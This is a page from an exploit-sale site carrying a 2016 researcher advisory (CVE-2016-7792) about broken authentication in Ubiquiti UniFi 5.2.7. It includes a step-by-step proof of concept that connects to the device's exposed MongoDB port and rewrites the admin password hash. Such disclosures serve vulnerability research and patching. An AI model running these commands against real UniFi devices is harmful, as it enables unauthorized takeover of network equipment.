0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Ubiquiti UniFi 5.2.7 Critical Vulnerability
Author
Risk
[
Security Risk Critical
]0day-ID
Category
Date add
CVE
Platform
together with my colleague we found two uncritical vulnerabilities you'll find below. Product: UniFi AP AC Lite Vendor: Ubiquiti Networks Inc. Internal reference: ? (Bug ID) Vulnerability type: Incorrect access control Vulnerable version: Unify 5.2.7 and possible other versions affected (not tested) Vulnerable component: Database Report confidence: yes Solution status: Not fixed by Vendor, the bug is a feature. Fixed versions: - Researcher credits: Tim Schughart, Immanuel Bär, Khanh Quoc Pham of ProSec Networks Solution date: - Public disclosure: 2016-09-30 CVE reference: CVE-2016-7792 CVSSv3: 8.8 AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H Vulnerability Details: You are able to connect to the access points database, because of an broken authentication (OWASP TOP10). So you are able to modify the database and read the data. An possible scenario you'll find in PoC section. Risk: An attacker gets access to the database and for e.g. is able to change the admins password, like you see in PoC below. PoC: 1. Generate SHA512 Hash with e.g. mkpasswd -m sha-512 2. Connect via network to database, e.g. : mongo --port 27117 --host target_ip 3. Change password via command "db.admin.update({"name":"ProSec"}, {$set : {"x_shadow": "$6$Se9i5I7k3hI8d4bk$CqEXRUwk7c7A/62E/HcC4SrMSLOrBdm7wRvwTS4t.nNJA3RYta0RfzJpuREg.qcAHsPGW9Gjwm3krJROXzbCv."}})" 4. Login via web interface with new password Best regards / Mit freundlichen Grüßen Tim Schughart CEO / Geschäftsführer # 0day.today [2024-12-25] #